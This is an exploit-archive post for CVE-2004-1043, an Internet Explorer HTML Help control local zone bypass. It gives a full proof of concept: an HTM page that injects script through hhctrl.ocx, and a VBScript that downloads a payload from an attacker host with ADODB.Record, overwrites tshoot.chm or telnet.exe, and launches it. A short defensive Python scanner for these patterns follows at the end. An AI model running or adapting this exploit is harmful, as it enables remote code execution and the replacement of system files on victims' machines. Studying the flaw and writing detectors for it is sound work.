
Microsoft Internet Explorer HTML Help Control 4.74 Bypass

Posted Jun 26, 2018
Authored by Eduardo Braun Prado

Microsoft Internet Explorer HTML Help Control version 4.74 local zone bypass exploit. Proof of concept code for an ancient vulnerability.

tags | exploit, local, proof of concept, bypass
advisories | CVE-2004-1043
SHA-256 | 7901eefcb2e2143481c3b0627e4f0d79c45b046af2b80d84196dc6c15a0701af

# Exploit Title: Microsoft Internet Explorer (CVE-2004-1043) - HTML Help Local Zone Bypass Vulnerability : Enhanced!

# Google Dork: N/A

# Date: June, 26, 2018

# Exploit Author: Eduardo Braun Prado

# Vendor Homepage: http://www.microsoft.com/

# Software Link: http://www.microsoft.com/

# Version: HTML Help Control v.4.74

# Tested on: Windows 98/ME/2000/XP (2003 is vulnerable too but you need to allow ActiveX and scripting on the Internet Zone of IE)

# CVE : CVE-2004-1043


MS IE HH Control Cross Domain Scripting vulnerability, enhanced to overwrite arbitrary local files and execute code instantly,
without the need to save files to the startup folder. This is accomplished through an ADO object that has pretty much the exact same functionality
as the recently killbitted 'ADODB.Stream' object. That object was probably killbitted because lots of users, especially enterprises, were complaining
about allowing an ActiveX control that is able to overwrite files on the system to be initialized. The problem is that Microsoft forgot about the "cousin" of 'ADODB.Stream':
'ADODB.Record', which is even easier to use and requires fewer lines of code, but there is a small trick I had to use to get it to actually write files on
the target system.


Vulnerable versions of Windows (and the HH component) can be exploited by malicious people to inject script code into arbitrary domains,
including local files. In that case it is possible to run arbitrary code, by design, since it is the Local Machine zone of MS IE.
On XP SP2, an important feature that had just been introduced (Local Machine Zone Lockdown) could be defeated.

Below is code modified and improved by me, so it works on any version of Windows and runs code instantly, without the need to save HTAs to
the startup folder. Link to the full PoC, which has the CHM file and the project that can be compiled using the HTML Help Workshop program:


=FULL POC Link=

https://onedrive.live.com/?id=AFCB9116C8C0AAF4%21339&cid=AFCB9116C8C0AAF4


- download the file "HH_CVE-2004-1043_PoC_Enhanced.zip"

password: 2004


Below is the exploit, improved, so we don't have to guess the startup folder path (which differs between Windows OS languages)
and it runs code instantly, without the need to reboot.


Important: Some PoCs on the internet have non-functional code to execute payloads via the 'HH Shortcut' feature.
The reason it does not work is that the HH shortcut feature is only enabled for programs that invoke HH via the HtmlHelp() API,
which is the case for Microsoft Help and Support Center, and thus the code I am providing INDEED WORKS!!



================================================================================================
HHxpl.htm
================================================================================================

<html>
<OBJECT id="localpage" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>

<!-- in the 'javascript:' URL below change 'site.com' with your host/IP -->

<OBJECT id="inject" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:
execScript("document.write(unescape(\"%3Cscript%20language=vbs%20src=http://site.com/run_instantly.vbs%3e%3c/script%3e\"))")'>
</OBJECT>

<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
</html>

================================================================================================
run_instantly.vbs
================================================================================================

On Error Resume Next


customEXE="file.exe"
customCHM="tshoot.chm"

Set ar = CreateObject("ADODB.Record")

Set xmld = CreateObject("MSXML2.DomDocument")
a = xmld.load("file://C:/windows/pchealth/helpctr/system/sysinfo/msinfo.xml")

'check if target is running Windows XP with Help and Support Center feature.



If a = true Then

ar.Open customCHM,"URL=http://site.com/" ' replace site.com with your host
ar.CopyRecord "","file://C:/windows/help/tshoot.chm" ' overwrites the legitimate 'tshoot.chm' help file.

setTimeout "ExecCommandXP()",200,"VBScript"

Else

ar.Open customExe,"URL=http://site.com/" ' replace site.com with your host
ar.CopyRecord "","file://C:/windows/system/telnet.exe" ' overwrites the legitimate 'telnet.exe' file on Win 9x/ME

If Err.Number <> 0 Then

ar.CopyRecord "","file://C:/winnt/system32/telnet.exe" ' overwrites the legitimate 'telnet.exe' file on Win NT/2000

End If

setTimeout "ExecCommandWin()",200,"VBScript"

End If


Sub ExecCommandXP()

document.write "<iframe src=hcp://help/tshoot/dvdregion.htm></iframe>"

End Sub


Sub ExecCommandWin()

document.write "<iframe src=telnet://127.0.0.1/></iframe>"

End Sub

=========================================EOF=======================================================
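As a defender-side addition (not part of the original PoC), the scanner below flags the two building blocks of this exploit in content at rest or in a proxy capture: an hhctrl.ocx OBJECT (classid adb880a6-d8ff-11cf-9377-00aa003b7a11 from the page) whose Related Topics item uses the 'command;' prefix with a javascript: or file: target, and script that instantiates ADODB.Record or ADODB.Stream together with a CopyRecord/SaveToFile call. The sample inputs are constructed and modelled on the PoC's structure; they are not the original files.

```python
import re

# Constructed samples (not the original exploit files): one malicious HTM,
# one benign HH "Related Topics" usage, and one ADODB.Record dropper script.
SAMPLE_HTM = """<html>
<OBJECT id="inject" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%>
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Item1" value='command;javascript:execScript("alert(1)")'>
</OBJECT>
<script>inject.HHClick();</script>
</html>"""
BENIGN_HTM = """<html><OBJECT classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Item1" value="Overview;intro.htm"></OBJECT></html>"""
SAMPLE_VBS = """On Error Resume Next
Set ar = CreateObject("ADODB.Record")
ar.Open "x.exe","URL=http://example.invalid/"
ar.CopyRecord "","file://C:/windows/system/telnet.exe"
"""

HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"  # HTML Help ActiveX control
OBJECT_RE = re.compile(r"<OBJECT\b.*?</OBJECT>", re.I | re.S)
ID_RE = re.compile(r"""\bid\s*=\s*["']?([^"'\s>]+)""", re.I)
# PARAM name/value; values may span lines (the PoC wraps its Item1 URL).
PARAM_RE = re.compile(
    r"""<PARAM\s+name\s*=\s*["']?(\w+)["']?\s+value\s*=\s*(?:"([^"]*)"|'([^']*)')""",
    re.I | re.S)
ADO_RE = re.compile(r"""CreateObject\s*\(\s*["'](ADODB\.(?:Record|Stream))["']\s*\)""", re.I)
WRITE_RE = re.compile(r"\.(CopyRecord|SaveToFile)\b", re.I)
DANGEROUS_SCHEMES = ("javascript", "file")

def hh_findings(html):
    """Return (object id, scheme) for each hhctrl OBJECT whose ItemN target is
    'command;' followed by a javascript: or file: URL (cross-zone navigation)."""
    hits = []
    for obj in OBJECT_RE.findall(html):
        if HHCTRL_CLSID not in obj.lower():
            continue
        m = ID_RE.search(obj)
        obj_id = m.group(1) if m else "(no id)"
        for name, dq, sq in PARAM_RE.findall(obj):
            value = (dq or sq).strip().lower()
            if not (name.lower().startswith("item") and value.startswith("command;")):
                continue
            target = value[len("command;"):].lstrip()
            scheme = target.split(":", 1)[0]
            if scheme in DANGEROUS_SCHEMES:
                hits.append((obj_id, scheme))
    return hits

def ado_findings(script):
    """Return (ProgID, writes_files) for each ADODB.Record/Stream instantiation;
    writes_files is True when CopyRecord or SaveToFile also appears."""
    writes = bool(WRITE_RE.search(script))
    return [(m.group(1), writes) for m in ADO_RE.finditer(script)]
```

A match from hh_findings alone is a cross-zone indicator; a match from both functions in one page or its fetched scripts is the full file-write-then-execute chain described above.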

Cheers!


